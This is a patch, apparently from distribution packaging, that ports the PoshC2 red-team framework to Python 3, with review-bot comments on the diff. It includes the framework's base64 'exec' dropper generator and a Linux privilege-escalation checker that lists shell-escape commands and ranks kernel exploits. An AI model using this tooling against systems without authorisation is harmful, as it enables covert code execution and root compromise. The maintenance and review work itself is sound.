From: Sophie Brun <[email protected]>
Date: Tue, 19 May 2020 14:24:05 +0200
Subject: Fix shebang and update for python3
Last-update: 2020-05-19
---
poshc2/client/command_handlers/ImplantHandler.py | 2 +-
poshc2/server/payloads/Payloads.py | 2 +-
resources/modules/linuxprivchecker.py | 169 ++++++++++++-----------
3 files changed, 87 insertions(+), 86 deletions(-)
diff --git a/poshc2/client/command_handlers/ImplantHandler.py b/poshc2/client/command_handlers/ImplantHandler.py
index d882548..6c0fb2a 100644
--- a/poshc2/client/command_handlers/ImplantHandler.py
+++ b/poshc2/client/command_handlers/ImplantHandler.py
@@ -925,7 +925,7 @@ def do_creds(user, command):
def do_pwnself(user, command):
- subprocess.Popen(["python2.7", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
+ subprocess.Popen(["python3", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
clear()
diff --git a/poshc2/server/payloads/Payloads.py b/poshc2/server/payloads/Payloads.py
index 134e361..fb7f065 100644
--- a/poshc2/server/payloads/Payloads.py
+++ b/poshc2/server/payloads/Payloads.py
@@ -471,7 +471,7 @@ class Payloads(object):
.replace("#REPLACEUSERAGENT#", self.UserAgent)
py = base64.b64encode(self.PyDropper.encode('UTF-8'))
- pydropper = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python2 &" % (py).decode('UTF-8')
+ pydropper = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python3 &" % (py).decode('UTF-8')
with open("%s%spy_dropper.sh" % (self.BaseDirectory, name), 'w') as f:
f.write(pydropper)
diff --git a/resources/modules/linuxprivchecker.py b/resources/modules/linuxprivchecker.py
index 3023e6b..3e6ce0d 100644
--- a/resources/modules/linuxprivchecker.py
+++ b/resources/modules/linuxprivchecker.py
@@ -1,4 +1,4 @@
-#!/usr/env python
+#!/usr/bin/env python3
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
@@ -34,20 +34,21 @@ except ImportError:
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"
-print bigline
-print "LINUX PRIVILEGE ESCALATION CHECKER"
-print bigline
-print
+print(bigline)
+print("LINUX PRIVILEGE ESCALATION CHECKER")
+print(bigline)
+print()
# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
for item in cmdDict:
cmd = cmdDict[item]["cmd"]
- if compatmode == 0: # newer version of python, use preferred subprocess
+ if compatmode == 0: # newer version of python, use preferred subprocess
out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
+ out = out.decode()
results = out.split('\n')
- else: # older version of python, use os.popen
- echo_stdout = os.popen(cmd, 'r')
+ else: # older version of python, use os.popen
+ echo_stdout = os.popen(cmd, 'r')
results = echo_stdout.read().split('\n')
cmdDict[item]["results"]=results
return cmdDict
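Review bot: The new line `out = out.decode()` decodes stdout with strict UTF-8, so a single non-UTF-8 byte in a command's output (file contents dumped by `cat`, locale-encoded file names from `find`) raises UnicodeDecodeError and aborts the whole script, which the Python 2 str handling never did; `out = out.decode(errors="replace")` keeps the port tolerant of such output. `error` is still read from stderr but never decoded or used, so `stderr=sub.DEVNULL` would be clearer than a PIPE whose contents are discarded. The `os.popen` fallback branch already yields str under Python 3, so only the subprocess branch needed a change, which the hunk correctly limits itself to.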
@@ -55,13 +56,13 @@ def execCmd(cmdDict):
# print results for each previously executed command, no return value
def printResults(cmdDict):
for item in cmdDict:
- msg = cmdDict[item]["msg"]
- results = cmdDict[item]["results"]
- print "[+] " + msg
+ msg = cmdDict[item]["msg"]
+ results = cmdDict[item]["results"]
+ print("[+] " + msg)
for result in results:
- if result.strip() != "":
- print " " + result.strip()
- print
+ if result.strip() != "":
+ print(" " + result.strip())
+ print()
return
def writeResults(msg, results):
@@ -74,7 +75,7 @@ def writeResults(msg, results):
return
# Basic system info
-print "[*] GETTING BASIC SYSTEM INFO...\n"
+print("[*] GETTING BASIC SYSTEM INFO...\n")
results=[]
@@ -88,7 +89,7 @@ printResults(sysInfo)
# Networking Info
-print "[*] GETTING NETWORKING INFO...\n"
+print("[*] GETTING NETWORKING INFO...\n")
netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
"ROUTE":{"cmd":"route", "msg":"Route", "results":results},
@@ -99,7 +100,7 @@ netInfo = execCmd(netInfo)
printResults(netInfo)
# File System Info
-print "[*] GETTING FILESYSTEM INFO...\n"
+print("[*] GETTING FILESYSTEM INFO...\n")
driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
@@ -117,7 +118,7 @@ cronInfo = execCmd(cronInfo)
printResults(cronInfo)
# User Info
-print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
+print("\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n")
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
"ID":{"cmd":"id","msg":"Current User ID", "results":results},
@@ -133,10 +134,10 @@ userInfo = execCmd(userInfo)
printResults(userInfo)
if "root" in userInfo["ID"]["results"][0]:
- print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
+ print("[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n")
# File/Directory Privs
-print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
+print("[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n")
fdPerms = {"WWDIRSROOT":{"cmd":"find / \(-wholename '/home/homedir*' -prune \) -o \(-type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \(-wholename '/home/homedir*' -prune \) -o \(-type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
@@ -157,7 +158,7 @@ pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)
# Processes and Applications
-print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
+print("[*] ENUMERATING PROCESSES AND APPLICATIONS...\n")
if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
@@ -179,7 +180,7 @@ otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Ve
otherApps = execCmd(otherApps)
printResults(otherApps)
-print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
+print("[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n")
# find the package information for the processes currently running
# under root or another super user
@@ -192,52 +193,52 @@ procdict = {} # dictionary to hold the processes running as super users
for proc in procs: # loop through each process
relatedpkgs = [] # list to hold the packages related to a process
try:
- for user in supusers: # loop through the known super users
- if (user != "") and (user in proc): # if the process is being run by a super user
- procname = proc.split(" ")[4] # grab the process name
- if "/" in procname:
- splitname = procname.split("/")
- procname = splitname[len(splitname)-1]
- for pkg in pkgs: # loop through the packages
- if not len(procname) < 3: # name too short to get reliable package results
- if procname in pkg:
- if procname in procdict:
- relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
- if pkg not in relatedpkgs:
- relatedpkgs.append(pkg) # add pkg to the list
+ for user in supusers: # loop through the known super users
+ if (user != "") and (user in proc): # if the process is being run by a super user
+ procname = proc.split(" ")[4] # grab the process name
+ if "/" in procname:
+ splitname = procname.split("/")
+ procname = splitname[len(splitname)-1]
+ for pkg in pkgs: # loop through the packages
+ if not len(procname) < 3: # name too short to get reliable package results
+ if procname in pkg:
+ if procname in procdict:
+ relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
+ if pkg not in relatedpkgs:
+ relatedpkgs.append(pkg) # add pkg to the list
procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
except:
- pass
+ pass
for key in procdict:
- print " " + key # print the process name
+ print(" " + key) # print the process name
try:
if not procdict[key][0] == "": # only print the rest if related packages were found
- print " Possible Related Packages: "
+ print(" Possible Related Packages: ")
for entry in procdict[key]:
- print " " + entry # print each related package
+ print(" " + entry) # print each related package
except:
- pass
+ pass
# EXPLOIT ENUMERATION
# First discover the avaialable tools
-print
-print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
+print()
+print("[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n")
devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)
-print "[+] Related Shell Escape Sequences...\n"
+print("[+] Related Shell Escape Sequences...\n")
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
for result in devTools["TOOLS"]["results"]:
if cmd in result:
- for item in escapeCmd[cmd]:
- print " " + cmd + "-->\t" + item
-print
-print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"
+ for item in escapeCmd[cmd]:
+ print(" " + cmd + "-->\t" + item)
+print()
+print("[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n")
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
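Review bot: On the new side, `if procname in procdict:` followed by `relatedpkgs = procdict[proc]` tests one key and reads another: `procdict` is keyed by the full `proc` line (`procdict[proc]=relatedpkgs`), so the "already in the dict" branch is effectively unreachable, and if it ever fired the KeyError would vanish into the bare `except: pass` below it. The two bare `except:` clauses this hunk re-indents also hide the IndexError from `proc.split(" ")[4]` and from `procdict[key][0]` on an empty list; narrowing them to `except (IndexError, KeyError):` would keep the best-effort behaviour without masking unrelated failures in a Python 3 port. Most of this hunk appears to be a whitespace re-indent mixed with the `print()` conversion, which makes the real changes hard to review; splitting the re-indent into its own commit would help.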
@@ -328,45 +329,45 @@ for sploit in sploits:
# first check for kernell applicability
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
# next check language applicability
- if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
- lang = 1 # language found, increase applicability score
- elif sploits[sploit]["lang"] == "sh":
- lang = 1 # language found, increase applicability score
- elif (sploits[sploit]["lang"] in str(langs)):
- lang = 1 # language found, increase applicability score
- if lang == 0:
- sploitout = sploitout + "**" # added mark if language not detected on system
+ if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
+ lang = 1 # language found, increase applicability score
+ elif sploits[sploit]["lang"] == "sh":
+ lang = 1 # language found, increase applicability score
+ elif (sploits[sploit]["lang"] in str(langs)):
+ lang = 1 # language found, increase applicability score
+ if lang == 0:
+ sploitout = sploitout + "**" # added mark if language not detected on system
# next check keyword matches to determine if some sploits have a higher probability of success
- for loc in sploits[sploit]["keywords"]["loc"]:
- if loc == "proc":
- for proc in procs:
- if keyword in proc:
- highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
- break
- break
- elif loc == "os":
- if (keyword in os) or (keyword in kernel):
- highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
- break
- elif loc == "mnt":
- if keyword in mount:
- highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
- break
- else:
- avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
-
-print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
-print
-
-print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
+ for loc in sploits[sploit]["keywords"]["loc"]:
+ if loc == "proc":
+ for proc in procs:
+ if keyword in proc:
+ highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
+ break
+ break
+ elif loc == "os":
+ if (keyword in os) or (keyword in kernel):
+ highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
+ break
+ elif loc == "mnt":
+ if keyword in mount:
+ highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
+ break
+ else:
+ avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
+
+print(" Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!")
+print()
+
+print(" The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system")
for exploit in highprob:
- print " - " + exploit
-print
+ print(" - " + exploit)
+print()
-print " The following exploits are applicable to this kernel version and should be investigated as well"
+print(" The following exploits are applicable to this kernel version and should be investigated as well")
for exploit in avgprob:
- print " - " + exploit
+ print(" - " + exploit)
-print
-print "Finished"
-print bigline
+print()
+print("Finished")
+print(bigline)
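Review bot: `if (keyword in os) or (keyword in kernel):` treats `os` as a string, while `execCmd` in the earlier hunk still calls `os.popen` on the module of that name; if the script rebinds `os` to the OS string somewhere before this loop (outside this hunk, so inferred), any later `execCmd` call in the `compatmode` fallback would fail with an AttributeError on a str. Renaming the string to something like `osname` (here and at its assignment) removes the shadowing. `keyword` and `lang` are not bound inside the hunk, and the enclosing `for sploit in sploits:` loop starts outside it, so their per-iteration reset could not be checked from this view.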